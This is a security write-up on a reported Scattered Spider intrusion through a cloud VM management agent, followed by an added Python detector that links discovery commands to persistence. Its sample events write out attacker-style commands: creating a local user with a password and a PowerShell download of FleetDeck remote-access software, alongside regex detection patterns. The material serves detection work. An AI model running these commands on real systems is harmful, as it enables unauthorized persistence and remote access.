In May 2024, CrowdStrike observed the cyber threat group Scattered Spider establish a foothold on a cloud-hosted virtual machine (VM) through a cloud service's VM management agent. The attackers obtained existing credentials through a phishing campaign and used them to authenticate to the cloud control plane. Once authenticated, they established persistence by executing commands on the cloud-hosted VM via the management agent, which runs those commands inside the guest without any interactive logon to the VM itself.
After gaining initial access, Scattered Spider used the ping command to test connectivity to various domains within and outside the target organization, likely to assess their level of access and visibility. They then ran multiple variations of the nltest command to identify domain controllers (DCs) of interest and used the wmic command to identify programs currently installed on the host.
The attackers solidified their persistence by creating a new user on the host and attempted to download FleetDeck remote access software.
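The discovery and persistence steps above (ping, nltest, wmic, then a new local user and a remote-access tool download) are individually common administrative actions; what makes them suspicious is the sequence and the parent process. The following is an added example, not CrowdStrike's code, that correlates constructed process-creation events per host and alerts only when a persistence action follows at least two distinct discovery techniques within a time window, optionally restricted to commands spawned by the management agent. The event format, the parent process name `cloud-vm-agent`, the exact command lines, and the sample events are all assumptions for illustration; the report does not publish them.

```python
"""Correlate discovery followed by persistence on a single host.

Added example: the event schema, the agent process name and every command
line below are assumptions constructed for illustration, not real telemetry.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (rule name, regex on the command line, phase). First match wins.
RULES = [
    ("ping_sweep",     r"^ping(\.exe)?\s",                                      "discovery"),
    ("nltest_dc_enum", r"^nltest(\.exe)?\s.*/(dclist|dsgetdc|domain_trusts)",  "discovery"),
    ("wmic_software",  r"^wmic(\.exe)?\s+product\b",                           "discovery"),
    ("local_user_add", r"^net1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add",            "persistence"),
    ("rmm_download",   r"(curl|wget|certutil|powershell)\b.*fleetdeck",        "persistence"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE), phase) for name, pat, phase in RULES]


def classify(cmdline):
    """Return (rule_name, phase) for the first rule matching cmdline, else None."""
    stripped = cmdline.strip()
    for name, rx, phase in COMPILED:
        if rx.search(stripped):
            return name, phase
    return None


def correlate(events, window_minutes=60, min_discovery=2, agent_parents=None):
    """Return {host: [discovery rules..., persistence rules...]} for hosts where a
    persistence rule fires within window_minutes after at least min_discovery
    distinct discovery rules. If agent_parents is given, only events whose
    parent process is in that set are considered (e.g. the VM management agent)."""
    by_host = defaultdict(list)
    for ev in events:
        if agent_parents is not None and ev["parent"] not in agent_parents:
            continue
        hit = classify(ev["cmdline"])
        if hit:
            by_host[ev["host"]].append((datetime.fromisoformat(ev["ts"]), hit[0], hit[1]))

    alerts = {}
    window = timedelta(minutes=window_minutes)
    for host, hits in by_host.items():
        hits.sort()  # chronological order
        discovery_seen, persistence_seen = set(), []
        for i, (ts, name, phase) in enumerate(hits):
            if phase != "persistence":
                continue
            # Discovery rules that fired on this host inside the window before this event.
            prior = {h[1] for h in hits[:i] if h[2] == "discovery" and ts - h[0] <= window}
            if len(prior) >= min_discovery:
                discovery_seen |= prior
                persistence_seen.append(name)
        if persistence_seen:
            alerts[host] = sorted(discovery_seen) + persistence_seen
    return alerts


# Constructed sample events (not real telemetry). vm-app-01 mirrors the
# sequence in the report; vm-db-02 is a benign account creation with no
# preceding discovery and should not alert.
SAMPLE_EVENTS = [
    {"ts": "2024-05-14T10:02:11", "host": "vm-app-01", "parent": "cloud-vm-agent",
     "cmdline": "ping corp.example.com"},
    {"ts": "2024-05-14T10:02:40", "host": "vm-app-01", "parent": "cloud-vm-agent",
     "cmdline": "ping dc01.corp.example.com"},
    {"ts": "2024-05-14T10:05:03", "host": "vm-app-01", "parent": "cloud-vm-agent",
     "cmdline": "nltest /dclist:corp.example.com"},
    {"ts": "2024-05-14T10:05:30", "host": "vm-app-01", "parent": "cloud-vm-agent",
     "cmdline": "nltest /domain_trusts"},
    {"ts": "2024-05-14T10:09:15", "host": "vm-app-01", "parent": "cloud-vm-agent",
     "cmdline": "wmic product get name,version"},
    {"ts": "2024-05-14T10:21:48", "host": "vm-app-01", "parent": "cloud-vm-agent",
     "cmdline": "net user svc_backup P@ssw0rd! /add"},
    {"ts": "2024-05-14T10:25:02", "host": "vm-app-01", "parent": "cloud-vm-agent",
     "cmdline": "powershell -c Invoke-WebRequest https://example.invalid/fleetdeck_agent.exe -OutFile C:\\Temp\\fd.exe"},
    {"ts": "2024-05-14T11:00:00", "host": "vm-db-02", "parent": "explorer.exe",
     "cmdline": "net user newhire Welcome1 /add"},
]


if __name__ == "__main__":
    for host, chain in correlate(SAMPLE_EVENTS, agent_parents={"cloud-vm-agent"}).items():
        print(f"ALERT {host}: {' -> '.join(chain)}")
```

The parent-process filter is the cloud-specific part: on a normal server, ping and nltest from an administrator's shell are noise, but the same commands spawned by the VM management agent mean someone with control-plane access is driving the guest, which is exactly the pivot this report describes. Tune `window_minutes` and `min_discovery` to the environment; the thresholds here are illustrative.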
The attack spanned three different operational domains: email (the phishing that yielded the credentials), the cloud management plane (authentication and command execution through the VM management agent), and the guest operating system of the VM (discovery, account creation, and tooling download). Because each domain produced only a fragment of the activity, and each fragment looked routine in isolation, the attack was difficult to detect from any single domain's telemetry.